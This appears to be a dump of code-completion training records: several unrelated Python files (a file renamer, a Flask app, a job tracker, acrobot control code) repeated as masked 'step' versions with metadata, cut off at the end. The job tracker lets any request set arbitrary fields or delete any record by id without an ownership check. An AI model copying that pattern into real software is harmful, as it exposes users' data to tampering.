if os.path.exists(test_dir):
shutil.rmtree(test_dir)
os.mkdir(test_dir)
for i in range(1, 10):
if i in [2, 8]:
i += 1
testfile_path = os.path.join(test_dir, '{}{:03d}'.format(
file_prefix, i))
create_test_file(testfile_path)
def main():
parser = argparse.ArgumentParser(description='Filling In The Gaps program')
parser.add_argument('-d', '--dir', help='Directory path.', dest=
'dir_path', required=True)
parser.add_argument('--file-prefix', required=True, help=
'File name prefix.')
parser.add_argument('-c', action='store_true', dest='create_tt', help=
'Create test tree.')
args = parser.parse_args()
if args.create_tt:
create_test_files(args.dir_path, args.file_prefix)
prev_num = 0
for filename in os.listdir(args.dir_path):
if re.match('{0}\\d{{3}}'.format(args.file_prefix), filename):
curr_num = int(filename.split(args.file_prefix)[1])
expected_num = prev_num + 1
if curr_num != expected_num:
old_path = os.path.join(args.dir_path, filename)
new_path = os.path.join(args.dir_path, '{}{:03d}'.format(
args.file_prefix, expected_num))
shutil.move(old_path, new_path)
curr_num = expected_num
prev_num = curr_num
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import os
import shutil
import re
import argparse
def create_test_file(filename):
with open(filename, 'w') as f:
f.write('foobar')
def create_test_files(test_dir, file_prefix):
if os.path.exists(test_dir):
shutil.rmtree(test_dir)
os.mkdir(test_dir)
for i in range(1, 10):
if i in [2, 8]:
i += 1
testfile_path = os.path.join(test_dir, '{}{:03d}'.format(
file_prefix, i))
create_test_file(testfile_path)
def main():
parser = argparse.ArgumentParser(description='Filling In The Gaps program')
parser.add_argument('-d', '--dir', help='Directory path.', dest=
'dir_path', required=True)
parser.add_argument('--file-prefix', required=True, help=
'File name prefix.')
parser.add_argument('-c', action='store_true', dest='create_tt', help=
'Create test tree.')
args = parser.parse_args()
if args.create_tt:
create_test_files(args.dir_path, args.file_prefix)
prev_num = 0
for filename in os.listdir(args.dir_path):
if re.match('{0}\\d{{3}}'.format(args.file_prefix), filename):
curr_num = int(filename.split(args.file_prefix)[1])
expected_num = prev_num + 1
if curr_num != expected_num:
old_path = os.path.join(args.dir_path, filename)
new_path = os.path.join(args.dir_path, '{}{:03d}'.format(
args.file_prefix, expected_num))
shutil.move(old_path, new_path)
curr_num = expected_num
prev_num = curr_num
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
#! python3
import os
import shutil
import re
import argparse
def create_test_file(filename):
with open(filename, "w") as f:
f.write("foobar")
def create_test_files(test_dir, file_prefix):
if os.path.exists(test_dir):
shutil.rmtree(test_dir)
os.mkdir(test_dir)
for i in range(1, 10):
# Introduce gaps
if i in [2, 8]:
i += 1
testfile_path = os.path.join(test_dir,
"{}{:03d}".format(file_prefix, i))
create_test_file(testfile_path)
def main():
parser = argparse.ArgumentParser(description='Filling In The Gaps program')
parser.add_argument('-d', '--dir',
help="Directory path.",
dest='dir_path',
required=True)
parser.add_argument('--file-prefix',
required=True,
help='File name prefix.')
parser.add_argument('-c', action='store_true',
dest='create_tt',
help='Create test tree.')
args = parser.parse_args()
if args.create_tt:
create_test_files(args.dir_path, args.file_prefix)
prev_num = 0
for filename in os.listdir(args.dir_path):
if re.match(r"{0}\d{{3}}".format(args.file_prefix), filename):
curr_num = int(filename.split(args.file_prefix)[1])
expected_num = prev_num + 1
if curr_num != expected_num:
old_path = os.path.join(args.dir_path, filename)
new_path = os.path.join(args.dir_path, "{}{:03d}".format(
args.file_prefix, expected_num))
shutil.move(old_path, new_path)
curr_num = expected_num
prev_num = curr_num
if __name__ == "__main__":
main()
|
flexible
|
{
"blob_id": "db684185c2b0a26cb101dc40090c84b64c554eeb",
"index": 2595,
"step-1": "<mask token>\n\n\ndef create_test_file(filename):\n with open(filename, 'w') as f:\n f.write('foobar')\n\n\n<mask token>\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Filling In The Gaps program')\n parser.add_argument('-d', '--dir', help='Directory path.', dest=\n 'dir_path', required=True)\n parser.add_argument('--file-prefix', required=True, help=\n 'File name prefix.')\n parser.add_argument('-c', action='store_true', dest='create_tt', help=\n 'Create test tree.')\n args = parser.parse_args()\n if args.create_tt:\n create_test_files(args.dir_path, args.file_prefix)\n prev_num = 0\n for filename in os.listdir(args.dir_path):\n if re.match('{0}\\\\d{{3}}'.format(args.file_prefix), filename):\n curr_num = int(filename.split(args.file_prefix)[1])\n expected_num = prev_num + 1\n if curr_num != expected_num:\n old_path = os.path.join(args.dir_path, filename)\n new_path = os.path.join(args.dir_path, '{}{:03d}'.format(\n args.file_prefix, expected_num))\n shutil.move(old_path, new_path)\n curr_num = expected_num\n prev_num = curr_num\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef create_test_file(filename):\n with open(filename, 'w') as f:\n f.write('foobar')\n\n\ndef create_test_files(test_dir, file_prefix):\n if os.path.exists(test_dir):\n shutil.rmtree(test_dir)\n os.mkdir(test_dir)\n for i in range(1, 10):\n if i in [2, 8]:\n i += 1\n testfile_path = os.path.join(test_dir, '{}{:03d}'.format(\n file_prefix, i))\n create_test_file(testfile_path)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Filling In The Gaps program')\n parser.add_argument('-d', '--dir', help='Directory path.', dest=\n 'dir_path', required=True)\n parser.add_argument('--file-prefix', required=True, help=\n 'File name prefix.')\n parser.add_argument('-c', action='store_true', dest='create_tt', help=\n 'Create test tree.')\n args = parser.parse_args()\n if args.create_tt:\n create_test_files(args.dir_path, args.file_prefix)\n prev_num = 0\n for filename in os.listdir(args.dir_path):\n if re.match('{0}\\\\d{{3}}'.format(args.file_prefix), filename):\n curr_num = int(filename.split(args.file_prefix)[1])\n expected_num = prev_num + 1\n if curr_num != expected_num:\n old_path = os.path.join(args.dir_path, filename)\n new_path = os.path.join(args.dir_path, '{}{:03d}'.format(\n args.file_prefix, expected_num))\n shutil.move(old_path, new_path)\n curr_num = expected_num\n prev_num = curr_num\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef create_test_file(filename):\n with open(filename, 'w') as f:\n f.write('foobar')\n\n\ndef create_test_files(test_dir, file_prefix):\n if os.path.exists(test_dir):\n shutil.rmtree(test_dir)\n os.mkdir(test_dir)\n for i in range(1, 10):\n if i in [2, 8]:\n i += 1\n testfile_path = os.path.join(test_dir, '{}{:03d}'.format(\n file_prefix, i))\n create_test_file(testfile_path)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Filling In The Gaps program')\n parser.add_argument('-d', '--dir', help='Directory path.', dest=\n 'dir_path', required=True)\n parser.add_argument('--file-prefix', required=True, help=\n 'File name prefix.')\n parser.add_argument('-c', action='store_true', dest='create_tt', help=\n 'Create test tree.')\n args = parser.parse_args()\n if args.create_tt:\n create_test_files(args.dir_path, args.file_prefix)\n prev_num = 0\n for filename in os.listdir(args.dir_path):\n if re.match('{0}\\\\d{{3}}'.format(args.file_prefix), filename):\n curr_num = int(filename.split(args.file_prefix)[1])\n expected_num = prev_num + 1\n if curr_num != expected_num:\n old_path = os.path.join(args.dir_path, filename)\n new_path = os.path.join(args.dir_path, '{}{:03d}'.format(\n args.file_prefix, expected_num))\n shutil.move(old_path, new_path)\n curr_num = expected_num\n prev_num = curr_num\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import os\nimport shutil\nimport re\nimport argparse\n\n\ndef create_test_file(filename):\n with open(filename, 'w') as f:\n f.write('foobar')\n\n\ndef create_test_files(test_dir, file_prefix):\n if os.path.exists(test_dir):\n shutil.rmtree(test_dir)\n os.mkdir(test_dir)\n for i in range(1, 10):\n if i in [2, 8]:\n i += 1\n testfile_path = os.path.join(test_dir, '{}{:03d}'.format(\n file_prefix, i))\n create_test_file(testfile_path)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Filling In The Gaps program')\n parser.add_argument('-d', '--dir', help='Directory path.', dest=\n 'dir_path', required=True)\n parser.add_argument('--file-prefix', required=True, help=\n 'File name prefix.')\n parser.add_argument('-c', action='store_true', dest='create_tt', help=\n 'Create test tree.')\n args = parser.parse_args()\n if args.create_tt:\n create_test_files(args.dir_path, args.file_prefix)\n prev_num = 0\n for filename in os.listdir(args.dir_path):\n if re.match('{0}\\\\d{{3}}'.format(args.file_prefix), filename):\n curr_num = int(filename.split(args.file_prefix)[1])\n expected_num = prev_num + 1\n if curr_num != expected_num:\n old_path = os.path.join(args.dir_path, filename)\n new_path = os.path.join(args.dir_path, '{}{:03d}'.format(\n args.file_prefix, expected_num))\n shutil.move(old_path, new_path)\n curr_num = expected_num\n prev_num = curr_num\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#! python3\nimport os\nimport shutil\nimport re\nimport argparse\n\n\ndef create_test_file(filename):\n with open(filename, \"w\") as f:\n f.write(\"foobar\")\n\n\ndef create_test_files(test_dir, file_prefix):\n if os.path.exists(test_dir):\n shutil.rmtree(test_dir)\n os.mkdir(test_dir)\n for i in range(1, 10):\n # Introduce gaps\n if i in [2, 8]:\n i += 1\n testfile_path = os.path.join(test_dir,\n \"{}{:03d}\".format(file_prefix, i))\n create_test_file(testfile_path)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Filling In The Gaps program')\n parser.add_argument('-d', '--dir',\n help=\"Directory path.\",\n dest='dir_path',\n required=True)\n parser.add_argument('--file-prefix',\n required=True,\n help='File name prefix.')\n parser.add_argument('-c', action='store_true',\n dest='create_tt',\n help='Create test tree.')\n\n args = parser.parse_args()\n\n if args.create_tt:\n create_test_files(args.dir_path, args.file_prefix)\n\n prev_num = 0\n for filename in os.listdir(args.dir_path):\n if re.match(r\"{0}\\d{{3}}\".format(args.file_prefix), filename):\n curr_num = int(filename.split(args.file_prefix)[1])\n expected_num = prev_num + 1\n if curr_num != expected_num:\n old_path = os.path.join(args.dir_path, filename)\n new_path = os.path.join(args.dir_path, \"{}{:03d}\".format(\n args.file_prefix, expected_num))\n shutil.move(old_path, new_path)\n curr_num = expected_num\n prev_num = curr_num\n\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import urllib2, os, logging, webapp2, random
#use logging.info("") to print stuff
from google.appengine.ext import webapp
from webapp2_extras import sessions
from google.appengine.ext.webapp import template
from google.appengine.ext import db
from conf import USERS, SESSION_KEY
from google.appengine.ext.db import BadValueError
class Job(db.Model):
title = db.StringProperty()
link = db.LinkProperty()
notes = db.TextProperty()
location = db.StringProperty()
compensation = db.StringProperty()
user = db.StringProperty()
class BaseHandler(webapp2.RequestHandler):
def unset_session(self):
self.session['user'] = ""
def dispatch(self):
self.session_store = sessions.get_store(request=self.request)
try:
webapp2.RequestHandler.dispatch(self)
finally:
self.session_store.save_sessions(self.response)
@webapp2.cached_property
def session(self):
return self.session_store.get_session()
def render_restricted_template(self, view_filename, params={}):
if ('user' in self.session and self.session['user'] != ""):
self.render_template(view_filename, params)
else:
self.render_template('message.html', {'msg': 'Not Logged in.', 'login': True, 'Error': True})
def render_template(self, view_filename, params={}):
path = os.path.join(os.path.dirname(__file__), 'templates', view_filename)
self.response.out.write(template.render(path, params))
class MainHandler(BaseHandler):
def get(self):
jobs = db.GqlQuery("SELECT * FROM Job WHERE user =:username", username=self.session['user'])
jobs_wid = []
for job in jobs:
jobs_wid.append([job, job.key().id()])
self.render_restricted_template('index.html', {'jobs': jobs_wid})
class ActionHandler(BaseHandler):
def get(self):
self.render_restricted_template('index.html', {})
def post(self):
#modify param value
if self.request.get('action') == 'modify' and self.request.get('id') and self.request.get('param') and self.request.get('value'):
job = Job.get_by_id(int(self.request.get('id')))
setattr(job, self.request.get('param'), self.request.get('value'))
job.put()
elif self.request.get('action') == 'delete' and self.request.get('id'):
job = Job.get_by_id(int(self.request.get('id')))
job.delete()
self.render_restricted_template('index.html', {})
class AddJobHandler(BaseHandler):
def get(self):
self.render_restricted_template('index.html', {})
def post(self):
try:
if self.request.get('link'):
link = self.request.get('link')
else:
link = None
job = Job(title=self.request.get('title'), link=link, notes=self.request.get('notes'), location=self.request.get('location'), compensation=self.request.get('compensation'), user=self.session['user'])
job.put()
self.render_restricted_template('index.html', {})
except BadValueError:
self.render_template('message.html', {'msg': 'Invalid Link', 'login': False, 'Error': True})
class LoginHandler(BaseHandler):
def get(self):
self.render_template('message.html', {'msg': 'Not Logged in.', 'login': True, 'Error': True})
def post(self):
if self.request.get('username') in USERS and USERS[self.request.get('username')] == self.request.get('password'):
self.session['user'] = self.request.get('username')
self.render_template('index.html', {'login': True})
else:
self.render_template('message.html', {'msg': 'Incorrect Credentials.', 'login': True, 'Error': True})
class LogoutHandler(BaseHandler):
def get(self):
self.session['user'] = ""
self.render_template('message.html', {'msg': 'Successfully Logged Out.'})
config = {'webapp2_extras.sessions': {'secret_key': SESSION_KEY}}
app = webapp2.WSGIApplication([
webapp2.Route('/', MainHandler, name='home'),
webapp2.Route('/login', LoginHandler, name='login'),
webapp2.Route('/logout', LogoutHandler, name='logout'),
webapp2.Route('/action', ActionHandler, name='action'),
webapp2.Route('/addjob', AddJobHandler, name='addjob')
], config=config, debug=True)
|
normal
|
{
"blob_id": "e7ef8debbff20cb178a3870b9618cbb0652af5af",
"index": 1626,
"step-1": "#!/usr/bin/env python\n#\n# Copyright 2007 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport urllib2, os, logging, webapp2, random\n#use logging.info(\"\") to print stuff\nfrom google.appengine.ext import webapp\nfrom webapp2_extras import sessions\nfrom google.appengine.ext.webapp import template\nfrom google.appengine.ext import db\nfrom conf import USERS, SESSION_KEY\nfrom google.appengine.ext.db import BadValueError\n\nclass Job(db.Model):\n\ttitle = db.StringProperty()\n\tlink = db.LinkProperty()\n\tnotes = db.TextProperty()\n\tlocation = db.StringProperty()\n\tcompensation = db.StringProperty()\n\tuser = db.StringProperty()\n\nclass BaseHandler(webapp2.RequestHandler):\n\tdef unset_session(self):\n\t\tself.session['user'] = \"\"\n\n\tdef dispatch(self):\n\t\tself.session_store = sessions.get_store(request=self.request)\n\t\ttry:\n\t\t\twebapp2.RequestHandler.dispatch(self)\n\t\tfinally:\n\t\t\tself.session_store.save_sessions(self.response)\n\n\t@webapp2.cached_property\n\tdef session(self):\n\t\treturn self.session_store.get_session()\n\n\tdef render_restricted_template(self, view_filename, params={}):\n\t\tif ('user' in self.session and self.session['user'] != \"\"):\n\t\t\tself.render_template(view_filename, params)\n\t\telse:\n\t\t\tself.render_template('message.html', {'msg': 'Not Logged in.', 'login': True, 'Error': True})\n\t\t\n\tdef render_template(self, view_filename, params={}):\n\t\tpath = 
os.path.join(os.path.dirname(__file__), 'templates', view_filename)\n\t\tself.response.out.write(template.render(path, params))\n\nclass MainHandler(BaseHandler):\n\tdef get(self):\n\t\tjobs = db.GqlQuery(\"SELECT * FROM Job WHERE user =:username\", username=self.session['user'])\n\t\tjobs_wid = []\n\t\tfor job in jobs:\n\t\t\tjobs_wid.append([job, job.key().id()])\n\t\tself.render_restricted_template('index.html', {'jobs': jobs_wid})\n\nclass ActionHandler(BaseHandler):\n\tdef get(self):\n\t\tself.render_restricted_template('index.html', {})\n\tdef post(self):\n\t\t#modify param value\n\t\tif self.request.get('action') == 'modify' and self.request.get('id') and self.request.get('param') and self.request.get('value'):\n\t\t\tjob = Job.get_by_id(int(self.request.get('id')))\n\t\t\tsetattr(job, self.request.get('param'), self.request.get('value'))\n\t\t\tjob.put()\n\t\telif self.request.get('action') == 'delete' and self.request.get('id'):\n\t\t\tjob = Job.get_by_id(int(self.request.get('id')))\n\t\t\tjob.delete()\n\t\tself.render_restricted_template('index.html', {})\n\nclass AddJobHandler(BaseHandler):\n\tdef get(self):\n\t\tself.render_restricted_template('index.html', {})\n\tdef post(self):\n\t\ttry:\n\t\t\tif self.request.get('link'):\n\t\t\t\tlink = self.request.get('link')\n\t\t\telse:\n\t\t\t\tlink = None\n\t\t\tjob = Job(title=self.request.get('title'), link=link, notes=self.request.get('notes'), location=self.request.get('location'), compensation=self.request.get('compensation'), user=self.session['user'])\n\t\t\tjob.put()\n\t\t\tself.render_restricted_template('index.html', {})\n\t\texcept BadValueError:\n\t\t\tself.render_template('message.html', {'msg': 'Invalid Link', 'login': False, 'Error': True})\n\n\nclass LoginHandler(BaseHandler):\n\tdef get(self):\n\t\tself.render_template('message.html', {'msg': 'Not Logged in.', 'login': True, 'Error': True})\n\tdef post(self):\n\t\tif self.request.get('username') in USERS and 
USERS[self.request.get('username')] == self.request.get('password'):\n\t\t\tself.session['user'] = self.request.get('username')\n\t\t\tself.render_template('index.html', {'login': True})\n\t\telse:\n\t\t\tself.render_template('message.html', {'msg': 'Incorrect Credentials.', 'login': True, 'Error': True})\n\nclass LogoutHandler(BaseHandler):\n def get(self):\n\t\tself.session['user'] = \"\"\n\t\tself.render_template('message.html', {'msg': 'Successfully Logged Out.'})\n\nconfig = {'webapp2_extras.sessions': {'secret_key': SESSION_KEY}}\napp = webapp2.WSGIApplication([\n webapp2.Route('/', MainHandler, name='home'),\n webapp2.Route('/login', LoginHandler, name='login'),\n webapp2.Route('/logout', LogoutHandler, name='logout'),\n webapp2.Route('/action', ActionHandler, name='action'),\n webapp2.Route('/addjob', AddJobHandler, name='addjob')\n], config=config, debug=True)",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
@app.route('/')
def index():
return '2018/6/1 hello python'
@app.route('/news')
def news():
return '内蒙古新闻资讯,请选择浏览'
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@app.route('/')
def index():
return '2018/6/1 hello python'
@app.route('/news')
def news():
return '内蒙古新闻资讯,请选择浏览'
if __name__ == '__main__':
manager.run()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
app = Flask(__name__)
manager = Manager(app)
@app.route('/')
def index():
return '2018/6/1 hello python'
@app.route('/news')
def news():
return '内蒙古新闻资讯,请选择浏览'
if __name__ == '__main__':
manager.run()
<|reserved_special_token_1|>
from flask import Flask
from flask_script import Manager
app = Flask(__name__)
manager = Manager(app)
@app.route('/')
def index():
return '2018/6/1 hello python'
@app.route('/news')
def news():
return '内蒙古新闻资讯,请选择浏览'
if __name__ == '__main__':
manager.run()
|
flexible
|
{
"blob_id": "f9d8280d765826b05bfa7989645e487431799f85",
"index": 7809,
"step-1": "<mask token>\n\n\n@app.route('/')\ndef index():\n return '2018/6/1 hello python'\n\n\n@app.route('/news')\ndef news():\n return '内蒙古新闻资讯,请选择浏览'\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\n@app.route('/')\ndef index():\n return '2018/6/1 hello python'\n\n\n@app.route('/news')\ndef news():\n return '内蒙古新闻资讯,请选择浏览'\n\n\nif __name__ == '__main__':\n manager.run()\n",
"step-3": "<mask token>\napp = Flask(__name__)\nmanager = Manager(app)\n\n\n@app.route('/')\ndef index():\n return '2018/6/1 hello python'\n\n\n@app.route('/news')\ndef news():\n return '内蒙古新闻资讯,请选择浏览'\n\n\nif __name__ == '__main__':\n manager.run()\n",
"step-4": "from flask import Flask\nfrom flask_script import Manager\napp = Flask(__name__)\nmanager = Manager(app)\n\n\n@app.route('/')\ndef index():\n return '2018/6/1 hello python'\n\n\n@app.route('/news')\ndef news():\n return '内蒙古新闻资讯,请选择浏览'\n\n\nif __name__ == '__main__':\n manager.run()\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
<|reserved_special_token_0|>
def control(q):
gs = np.array([pi / 2, 0, 0, 0])
return -k.dot(q - gs)
def reward_fn(s, a):
reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])
done = reward < 2
return reward, done
def do_rollout(args):
x, trial_num = args
th1, th2, dth1, dth2 = x
np.random.seed(trial_num)
local_reward_hist = np.ones((env.num_steps, 1)) * -1
obs = env.reset(init_vec=[th1, th2, dth1, dth2])
for i in range(env.num_steps):
actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque)
obs, reward, done, _ = env.step(actions)
local_reward_hist[i, :] = np.copy(reward)
if done:
break
return local_reward_hist, i
<|reserved_special_token_0|>
def reward_fn(s, a):
reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])
return reward, False
def do_rollout(trial_num):
np.random.seed(trial_num)
act_hold = 20
hold_count = 0
obs = env.reset()
local_lqr = False
actions = np.random.randn(1) * 3
local_state_hist = np.zeros((env.num_steps, env.observation_space.shape[0])
)
local_reward_hist = np.zeros((env.num_steps, 1))
local_gate_hist = np.zeros((env.num_steps, 1))
local_action_hist = np.zeros((env.num_steps, 1))
for i in range(env.num_steps):
obs = np.array(obs, dtype=np.float32)
if sig(net(obs)) > 0.85:
actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque
)
local_lqr = True
local_gate_hist[i] = 1
else:
local_gate_hist[i] = 0
if hold_count == act_hold:
actions = np.random.randn(1) * 3
hold_count = 0
hold_count += 1
obs, reward, done, _ = env.step(actions)
local_action_hist[i, :] = np.copy(actions)
local_state_hist[i, :] = np.copy(obs)
local_reward_hist[i, :] = np.copy(reward)
return (local_action_hist, local_state_hist, local_reward_hist,
local_gate_hist, local_lqr)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
assert np.linalg.matrix_rank(Ctr) == 4
<|reserved_special_token_0|>
print(k)
def control(q):
gs = np.array([pi / 2, 0, 0, 0])
return -k.dot(q - gs)
def reward_fn(s, a):
reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])
done = reward < 2
return reward, done
def do_rollout(args):
x, trial_num = args
th1, th2, dth1, dth2 = x
np.random.seed(trial_num)
local_reward_hist = np.ones((env.num_steps, 1)) * -1
obs = env.reset(init_vec=[th1, th2, dth1, dth2])
for i in range(env.num_steps):
actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque)
obs, reward, done, _ = env.step(actions)
local_reward_hist[i, :] = np.copy(reward)
if done:
break
return local_reward_hist, i
<|reserved_special_token_0|>
samples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min -
th1dot_max, th2dot_min - th2dot_max])
samples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])
<|reserved_special_token_0|>
for i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(
num_trials / 2))))):
rews, steps = res
reward_hist[i, :, :] = rews
total_steps += steps
X[i, :] = samples[i, :]
Y[i] = sum(rews) > env.num_steps * 3 - 10
<|reserved_special_token_0|>
samples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min -
th1dot_max, th2dot_min - th2dot_max])
samples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])
<|reserved_special_token_0|>
for i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(
num_trials / 2), int(num_trials))))):
rews, steps = res
reward_hist[i, :, :] = rews
total_steps += steps
X[i + int(num_trials / 2), :] = samples[i, :]
Y[i + int(num_trials / 2)] = sum(rews) > env.num_steps * 3 - 5
print(time.time() - start)
<|reserved_special_token_0|>
plt.close()
plt.plot(loss_hist)
plt.show()
<|reserved_special_token_0|>
for i, j in product(range(n_th), range(n_th)):
coords[j, i, :] = np.array([th1_vals[i], th2_vals[j], 0, 0])
<|reserved_special_token_0|>
print(end - start)
<|reserved_special_token_0|>
ax.set_title('Theta')
ax.set_xlabel('Th1')
ax.set_ylabel('Th2')
ax.axis([x.min(), x.max(), y.min(), y.max()])
fig.colorbar(c, ax=ax)
plt.show()
<|reserved_special_token_0|>
for i, j in product(range(n_th), range(n_th)):
coords[j, i, :] = np.array([pi / 2, 0, th1dot_vals[i], th2dot_vals[j]])
<|reserved_special_token_0|>
print(end - start)
<|reserved_special_token_0|>
ax.set_title('DTheta')
ax.set_xlabel('dth1')
ax.set_ylabel('dth2')
ax.axis([x.min(), x.max(), y.min(), y.max()])
fig.colorbar(c, ax=ax)
plt.show()
torch.set_default_dtype(torch.float32)
def reward_fn(s, a):
reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])
return reward, False
def do_rollout(trial_num):
np.random.seed(trial_num)
act_hold = 20
hold_count = 0
obs = env.reset()
local_lqr = False
actions = np.random.randn(1) * 3
local_state_hist = np.zeros((env.num_steps, env.observation_space.shape[0])
)
local_reward_hist = np.zeros((env.num_steps, 1))
local_gate_hist = np.zeros((env.num_steps, 1))
local_action_hist = np.zeros((env.num_steps, 1))
for i in range(env.num_steps):
obs = np.array(obs, dtype=np.float32)
if sig(net(obs)) > 0.85:
actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque
)
local_lqr = True
local_gate_hist[i] = 1
else:
local_gate_hist[i] = 0
if hold_count == act_hold:
actions = np.random.randn(1) * 3
hold_count = 0
hold_count += 1
obs, reward, done, _ = env.step(actions)
local_action_hist[i, :] = np.copy(actions)
local_state_hist[i, :] = np.copy(obs)
local_reward_hist[i, :] = np.copy(reward)
return (local_action_hist, local_state_hist, local_reward_hist,
local_gate_hist, local_lqr)
<|reserved_special_token_0|>
for i, res in enumerate(pool.imap(do_rollout, range(num_trials))):
acts, obs, rews, gate, lqr_on = res
action_hist[i, :, :] = acts
state_hist[i, :, :] = obs
reward_hist[i, :, :] = rews
gate_hist[i, :, :] = gate
err_hist[i] = np.sqrt(sum((state_hist[i, -1, :] - np.array([pi / 2, 0,
0, 0])) ** 2))
if lqr_on:
lqr_list.append(i)
if err_hist[i] < 2:
success_list.append(i)
print(len(lqr_list))
print(len(success_list))
print((time.time() - global_start) / 60)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
global_start = time.time()
m1 = 1
m2 = 1
l1 = 1
l2 = 2
lc1 = 0.5
lc2 = 1
I1 = 0.083
I2 = 0.33
g = 9.8
dt = 0.01
max_torque = 25
integrator = euler
Q = np.identity(4)
Q[0, 0] = 1
Q[1, 1] = 1
Q[2, 2] = 1
Q[3, 3] = 1
R = np.identity(2) * 0.01
eval_max_t = 10
th1 = pi / 2
th2 = 0
th1d = 0
th2d = 0
TAU = np.array([[0], [1]])
m11 = m1 * lc1 ** 2 + m2 * (l1 ** 2 + lc2 ** 2 + 2 * l1 * lc2 * cos(th2)
) + I1 + I2
m22 = m2 * lc2 ** 2 + I2
m12 = m2 * (lc2 ** 2 + l1 * lc2 * cos(th2)) + I2
M = np.array([[m11, m12], [m12, m22]])
h1 = -m2 * l1 * lc2 * sin(th2) * th2d ** 2 - 2 * m2 * l1 * lc2 * sin(th2
) * th2d * th1d
h2 = m2 * l1 * lc2 * sin(th2) * th1d ** 2
H = np.array([[h1], [h2]])
phi1 = (m1 * lc1 + m2 * l1) * g * cos(th1) + m2 * lc2 * g * cos(th1 + th2)
phi2 = m2 * lc2 * g * cos(th1 + th2)
PHI = np.array([[phi1], [phi2]])
Bl = np.linalg.inv(M) @ TAU
Blin = np.array([[0, 0], [0, 0], [0, Bl[0].item()], [0, Bl[1].item()]])
DPHI = np.array([[-g * (m1 * lc1 + m2 * l1 + m2 * lc2), -m2 * lc2 * g], [-
m2 * lc2 * g, -m2 * lc2 * g]])
Al = -np.linalg.inv(M) @ DPHI
Alin = np.array([[0, 0, 1, 0], [0, 0, 0, 1], [Al[0, 0], Al[0, 1], 0, 0], [
Al[1, 0], Al[1, 1], 0, 0]])
Ctr = ctrb(Alin, Blin)
assert np.linalg.matrix_rank(Ctr) == 4
K, S, E = lqr(Alin, Blin, Q, R)
k = np.array(K[1, :])
print(k)
def control(q):
gs = np.array([pi / 2, 0, 0, 0])
return -k.dot(q - gs)
def reward_fn(s, a):
reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])
done = reward < 2
return reward, done
def do_rollout(args):
x, trial_num = args
th1, th2, dth1, dth2 = x
np.random.seed(trial_num)
local_reward_hist = np.ones((env.num_steps, 1)) * -1
obs = env.reset(init_vec=[th1, th2, dth1, dth2])
for i in range(env.num_steps):
actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque)
obs, reward, done, _ = env.step(actions)
local_reward_hist[i, :] = np.copy(reward)
if done:
break
return local_reward_hist, i
start = time.time()
config = {'init_state': [0, 0, 0, 0], 'max_torque': max_torque,
'init_state_weights': [0, 0, 0, 0], 'max_t': 2.5, 'dt': dt, 'm2': m2,
'm1': m1, 'l1': l1, 'lc1': lc1, 'lc2': lc2, 'i1': I1, 'i2': I2,
'integrator': integrator, 'reward_fn': reward_fn, 'act_hold': 1}
env = gym.make('su_acrobot-v0', **config)
num_trials = 200000
reward_hist = np.zeros((num_trials, env.num_steps, 1))
X = np.zeros((num_trials, 4), dtype=np.float32)
Y = np.zeros((num_trials, 1), dtype=np.float32)
th1_min = pi / 2 - 0.5
th1_max = pi / 2 + 0.5
th2_min = -1
th2_max = 1
th1dot_min = -5
th1dot_max = 5
th2dot_min = -10
th2dot_max = 10
samples = np.random.random_sample((int(num_trials / 2), 4))
samples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min -
th1dot_max, th2dot_min - th2dot_max])
samples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])
total_steps = 0
pool = Pool()
for i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(
